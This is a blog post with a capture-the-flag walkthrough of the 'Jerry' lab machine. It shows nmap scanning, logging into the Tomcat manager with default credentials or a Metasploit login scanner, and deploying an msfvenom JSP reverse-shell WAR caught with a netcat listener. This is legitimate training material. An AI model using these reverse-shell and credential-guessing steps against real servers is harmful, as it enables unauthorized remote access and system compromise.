<!doctype html>
<html lang="en" dir="ltr" class="blog-wrapper blog-post-page plugin-blog plugin-id-default" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.7.0">
<title data-rh="true">Jerry | Penetration Testing Journal</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://danae-pan.github.io/Blog/blog/Jerry"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docusaurus_tag" content="default"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docsearch:docusaurus_tag" content="default"><meta data-rh="true" property="og:title" content="Jerry | Penetration Testing Journal"><meta data-rh="true" name="description" content="Task1"><meta data-rh="true" property="og:description" content="Task1"><meta data-rh="true" property="og:type" content="article"><meta data-rh="true" property="article:published_time" content="2025-04-06T00:00:00.000Z"><meta data-rh="true" property="article:tag" content="easy,windows"><link data-rh="true" rel="canonical" href="https://danae-pan.github.io/Blog/blog/Jerry"><link data-rh="true" rel="alternate" href="https://danae-pan.github.io/Blog/blog/Jerry" hreflang="en"><link data-rh="true" rel="alternate" href="https://danae-pan.github.io/Blog/blog/Jerry" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","@id":"https://danae-pan.github.io/Blog/blog/Jerry","mainEntityOfPage":"https://danae-pan.github.io/Blog/blog/Jerry","url":"https://danae-pan.github.io/Blog/blog/Jerry","headline":"Jerry","name":"Jerry","description":"Task1","datePublished":"2025-04-06T00:00:00.000Z","author":[],"keywords":[],"isPartOf":{"@type":"Blog","@id":"https://danae-pan.github.io/Blog/blog","name":"Intro to Red Team"}}</script><link rel="alternate" type="application/rss+xml" href="/Blog/blog/rss.xml" title="Penetration Testing Journal RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/Blog/blog/atom.xml" title="Penetration Testing Journal Atom Feed"><link rel="stylesheet" href="/Blog/assets/css/styles.e69e0e8b.css">
<script src="/Blog/assets/js/runtime~main.6b8da662.js" defer="defer"></script>
<script src="/Blog/assets/js/main.ca226f47.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"dark")}(),function(){try{const n=new URLSearchParams(window.location.search).entries();for(var[t,e]of n)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/Blog/"><b class="navbar__title text--truncate">About Me</b></a><a class="navbar__item navbar__link" href="/Blog/docs/phases/Introduction">Guides</a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/Blog/blog/">Write Ups</a></div><div class="navbar__items navbar__items--right"><a class="navbar__item navbar__link" href="/Blog/docs/stories/Brain: the first computer virus">Bedtime Stories</a><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="container margin-vert--lg"><div class="row"><aside class="col col--3"><nav class="sidebar_re4s thin-scrollbar" aria-label="Blog recent posts navigation"><div class="sidebarItemTitle_pO2u margin-bottom--md">Recent posts</div><div role="group"><h3 class="yearGroupHeading_rMGB">2025</h3><ul class="sidebarItemList_Yudw clean-list"><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Precious">Precious</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Writeup">Writeup</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Paper">Paper</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Devvortex">Devvortex</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/GoodGames">Good Games</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Sau">Sau</a></li><li class="sidebarItem__DBe"><a aria-current="page" class="sidebarItemLink_mo7H sidebarItemLinkActive_I1ZP" href="/Blog/blog/Jerry">Jerry</a></li><li class="sidebarItem__DBe"><a class="sidebarItemLink_mo7H" href="/Blog/blog/Cap">Cap</a></li></ul></div></nav></aside><main class="col col--7"><article class=""><header><h1 class="title_f1Hy">Jerry</h1><div class="container_mt6G margin-vert--md"><time datetime="2025-04-06T00:00:00.000Z">April 6, 2025</time> · <!-- -->4 min read</div></header><div id="__blog-post-container" class="markdown"><h3 class="anchor anchorWithStickyNavbar_LWe7" id="task1">Task1<a href="#task1" class="hash-link" aria-label="Direct link to Task1" title="Direct link to Task1">​</a></h3>
<p>Which TCP port is open on the remote host?</p>
<p>Run nmap to scan for ports</p>
<p><code>nmap -sS -p- &lt;target_ip&gt;</code></p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-13e88223d5fcbe743d32858ceda2d22e.png" width="680" height="222" class="img_ev3q"></p>
<p>After scanning, the port 8080 is revelead to be open, where the http-proxy service is running.</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-2">Task 2<a href="#task-2" class="hash-link" aria-label="Direct link to Task 2" title="Direct link to Task 2">​</a></h3>
<p>Which web server is running on the remote host? Looking for two words.</p>
<p>To find the web server, we need to add the version field on the nmap scan.</p>
<p><code>nmap -sV -p 8080 &lt;target_ip&gt;</code></p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-1-9bc478d2c4c78cf3404b0c25a80bdfce.png" width="801" height="274" class="img_ev3q"></p>
<p>We see on the version that the web server is <strong>Apache Tomcat</strong>.</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-3">Task 3<a href="#task-3" class="hash-link" aria-label="Direct link to Task 3" title="Direct link to Task 3">​</a></h3>
<p>Which relative path on the webserver leads to the Web Application Manager?</p>
<p>Open a browser and navigate to the ip address of the target. Remember to specify the port to be 8080.</p>
<p>Take a look at the page, to see you can find anything useful. Under <strong>Managing Tomcat</strong> you see a URL to <strong>manager webapp</strong> which might be what is refered as Web Application Manager. It is stated that for security, access is restricted and users are defined in <strong>$CATALINA_HOME/conf/tomcat-users.xml</strong>. This seems like an interesting information, but let&#x27;s first see what the URL gets us. When clicking we get redirected to <strong>/manager/html</strong> where we are asked to input our credential. This is a point we should keep in mind, but for now we got the relative path the question is asking for.</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-4">Task 4<a href="#task-4" class="hash-link" aria-label="Direct link to Task 4" title="Direct link to Task 4">​</a></h3>
<p>What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username<!-- -->:password</p>
<p>On the previous step, we navigated to the <strong>/manager/html</strong> were we were asked for credentials. Since we were not able to authenticate, we show an example in the page of how to add a role to a user for accesssing the manager application. We can try to use those example credentials and see if they work on the login prompt, and they do!</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-6-b730756cc58d8a5efdd00ae6ffd2a0f1.png" width="993" height="395" class="img_ev3q"></p>
<p>Another approach to this, is using <strong>Metasploit Framework</strong>. First, run <code>msfconsole</code> and then <code>search tomcat</code>. There you will find the auxiliary <strong>auxiliary/scanner/http/tomcat_mgr_login</strong> which will attempt to login based on a list of username - password names. To use it, run <code>use &lt;number_of_option&gt;</code> and then to see what you it is required for you to set <code>show options</code>.</p>
<p>To select the target IP address and the port, run <code>set RHOSTS &lt;target_ip&gt;</code> and <code>set RPORT &lt;target_port&gt;</code>. Then type <code>run</code> and you will see that a login attempt was succesfull! As seen, those are the same credentials that were found before.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-7-bb38c07471055921e123bb8eb4812166.png" width="752" height="246" class="img_ev3q"></p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-5">Task 5<a href="#task-5" class="hash-link" aria-label="Direct link to Task 5" title="Direct link to Task 5">​</a></h3>
<p>Which file type can be uploaded and deployed on the server using the Tomcat Web Application Manager?</p>
<p>After authenticating in the previous page, you will see this part in the Web Application Manager page:</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-3-dd6c3ee530600db4dff963a82b2500d0.png" width="920" height="283" class="img_ev3q"></p>
<p>We can see that the file type is <strong>WAR</strong>.</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="task-6">Task 6<a href="#task-6" class="hash-link" aria-label="Direct link to Task 6" title="Direct link to Task 6">​</a></h3>
<p>Submit the flag located on the user&#x27;s desktop.</p>
<p>From the previous task, we realised we would be able to upload a war file, which smells like a backdoor we could use for remote code execution. A war file is used to deploy java based applications and we can use it to deploy a reverse shell and gain remote access to the target system.</p>
<p>We can generate a war file using msfvenom</p>
<p><code>msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;your_ip&gt; LPORT=&lt;your_port&gt; -f war &gt; shell.war</code></p>
<p>An open the port that was specified so we can listen to the connection from the target</p>
<p><code>sudo nc -lvnp &lt;your_port&gt;</code></p>
<p>Then we navigate to the manager page and upload the war payload.
On the list of applications we can see our deployment</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-8-09af0a711e62d49783cddede3487b0d1.png" width="954" height="77" class="img_ev3q"></p>
<p>Then we can navigate to the <strong>/shell</strong> path and on our temrminal that we opened the port we can see are connected!</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-9-76a69ce4d2d0651e8e5e429b3b3f6f5d.png" width="276" height="88" class="img_ev3q"></p>
<p>Navigating to the directory <strong>\Users\Administrator\Desktop</strong> and lisitng the direcrtories, we find a folder named flags.</p>
<p><img decoding="async" loading="lazy" alt="alt text" src="/Blog/assets/images/image-j-10-1a456c60f264d148761cf339e345eaac.png" width="590" height="231" class="img_ev3q"></p>
<p>Running <code>type &quot;2 for the price of 1.txt&quot;</code> we get both the user and the root flags.</p></div><footer class="docusaurus-mt-lg"><div class="row margin-top--sm theme-blog-footer-edit-meta-row"><div class="col"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/Blog/blog/tags/easy">easy</a></li><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/Blog/blog/tags/windows">windows</a></li></ul></div></div><div class="row margin-top--sm theme-blog-footer-edit-meta-row"><div class="col"><a href="https://github.com/danae-pan/Blog/blog/Jerry.md" target="_blank" rel="noopener noreferrer" class="theme-edit-this-page"><svg fill="currentColor" height="20" width="20" viewBox="0 0 40 40" class="iconEdit_Z9Sw" aria-hidden="true"><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"></path></g></svg>Edit this page</a></div><div class="col lastUpdated_JAkA"></div></div></footer></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Blog post page navigation"><a class="pagination-nav__link pagination-nav__link--prev" href="/Blog/blog/Sau"><div class="pagination-nav__sublabel">Newer post</div><div class="pagination-nav__label">Sau</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/Blog/blog/Cap"><div class="pagination-nav__sublabel">Older post</div><div class="pagination-nav__label">Cap</div></a></nav></main><div class="col col--2"><div class="tableOfContents_bqdL thin-scrollbar"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#task1" class="table-of-contents__link toc-highlight">Task1</a></li><li><a href="#task-2" class="table-of-contents__link toc-highlight">Task 2</a></li><li><a href="#task-3" class="table-of-contents__link toc-highlight">Task 3</a></li><li><a href="#task-4" class="table-of-contents__link toc-highlight">Task 4</a></li><li><a href="#task-5" class="table-of-contents__link toc-highlight">Task 5</a></li><li><a href="#task-6" class="table-of-contents__link toc-highlight">Task 6</a></li></ul></div></div></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="col footer__col"><div class="footer__title">Contact</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://github.com/danae-pan" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li class="footer__item"><a href="https://linkedin.com/in/anastasia-danai-panagiotopoulou" target="_blank" rel="noopener noreferrer" class="footer__link-item">LinkedIn<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div></div></div></footer></div>
</body>
</html>